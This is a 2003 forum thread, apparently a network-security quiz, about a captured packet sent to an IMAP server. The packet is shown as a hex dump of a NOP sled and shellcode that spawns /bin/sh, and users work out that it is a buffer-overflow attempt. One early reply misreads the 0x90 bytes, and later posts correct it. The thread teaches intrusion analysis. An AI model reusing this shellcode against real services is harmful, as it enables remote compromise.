bsdjunkie
March 18th, 2003, 21:14
Ok, yet another easy one.... What can you tell from this capture? Whats the attacker trying to exploit? Whats the significance of the 0x90 in hex?

good luck =P


052499-22:27:58.403313 192.168.1.4:1034 -> 192.168.1.3:143
TCP TTL:64 TOS:0x0 DF
***PA* Seq: 0x5295B44E Ack: 0x1B4F8970 Win: 0x7D78
90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 3B ...............;
5E 89 76 08 31 ED 31 C9 31 C0 88 6E 07 89 6E 0C ^.v.1.1.1..n..n.
B0 0B 89 F3 8D 6E 08 89 E9 8D 6E 0C 89 EA CD 80 .....n....n.....
31 DB 89 D8 40 CD 80 90 90 90 90 90 90 90 90 90 1...@...........
90 90 90 90 90 90 90 90 90 90 90 E8 C0 FF FF FF ................
2F 62 69 6E 2F 73 68 90 90 90 90 90 90 90 90 90 /bin/sh.........

schotty
March 19th, 2003, 02:51
Ok, yet another easy one.... What can you tell from this capture? Whats the attacker trying to exploit? Whats the significance of the 0x90 in hex?

good luck =P


052499-22:27:58.403313 192.168.1.4:1034 -> 192.168.1.3:143
TCP TTL:64 TOS:0x0 DF
***PA* Seq: 0x5295B44E Ack: 0x1B4F8970 Win: 0x7D78
90 90 90 90 90 90 90 90 90 90 90 90 90 90 EB 3B ...............;
5E 89 76 08 31 ED 31 C9 31 C0 88 6E 07 89 6E 0C ^.v.1.1.1..n..n.
B0 0B 89 F3 8D 6E 08 89 E9 8D 6E 0C 89 EA CD 80 .....n....n.....
31 DB 89 D8 40 CD 80 90 90 90 90 90 90 90 90 90 1...@...........
90 90 90 90 90 90 90 90 90 90 90 E8 C0 FF FF FF ................
2F 62 69 6E 2F 73 68 90 90 90 90 90 90 90 90 90 /bin/sh.........

Hmm not sure, but this would make me very suspicious without knowing more info. 0x90 is M^P which when sent to /bin/sh should IIRC do a previous command executed. So unless someone is telnetted in legitimately, there are possible problems ;D

bsdjunkie
March 24th, 2003, 12:39
No one else has any ideas/input on this?

Strog
March 24th, 2003, 22:57
0x90 in hex is NOP codes for Intel-based remote buffer overflow-based attacks.

My guess is a buffer overflow attempt on the imap service at 10:27pm. That's the best I can do at the moment. I really need to educate myself better in this area.

:roll:

schotty
March 24th, 2003, 23:49
I really need to educate myself better in this area.


Dont feel alone ;D As you may have noticed, I am not exactly God in Net Security.


BTW, how the hell close was I ?

bsdjunkie
March 25th, 2003, 12:30
Strog has it right. This was a buffer overflow attempt against port 143 which runs the IMAP daemon. As you can see the attacker is trying to get a root shell. The 0x90 are NOPs and this is commonly referred to as a NOP Sled.

A NOP sled is a series of no-operation instructions in the machine code of the target architecture. This series is often used as part of a buffer overflow technique, where the return address in the call stack is modified to point to exploit code. By using a NOP sled, the precise address of the exploit code need not be known instead, an address in the middle of the NOPs is chosen, causing execution to slide into the exploit code.